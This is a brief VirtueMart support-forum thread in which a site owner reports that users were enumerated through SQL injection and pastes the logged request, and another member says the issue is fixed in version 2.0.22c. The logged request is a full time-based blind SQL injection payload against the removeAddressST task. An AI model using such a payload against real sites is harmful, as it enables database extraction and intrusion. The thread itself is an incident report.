News:

Support the VirtueMart project and become a member

Main Menu

SQL injection

Started by Arkadiy, October 03, 2013, 05:10:27 AM

Previous topic - Next topic

Arkadiy

Щn one of my sites using the SQL injection was considered users. The injection took place in such a query:
GET /index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=1%22and(IF(ASCII(SUBSTRING((SELECT%20Database()),2,1))=112,BENCHMARK(51544503,MD5(1)),1))and%221%22=%221 HTTP/1.0

AH

Regards
A

Joomla 4.4.5
php 8.1

alatak

Hello

This is issue is fixed in vm2.0.22c

AH

Regards
A

Joomla 4.4.5
php 8.1

Arkadiy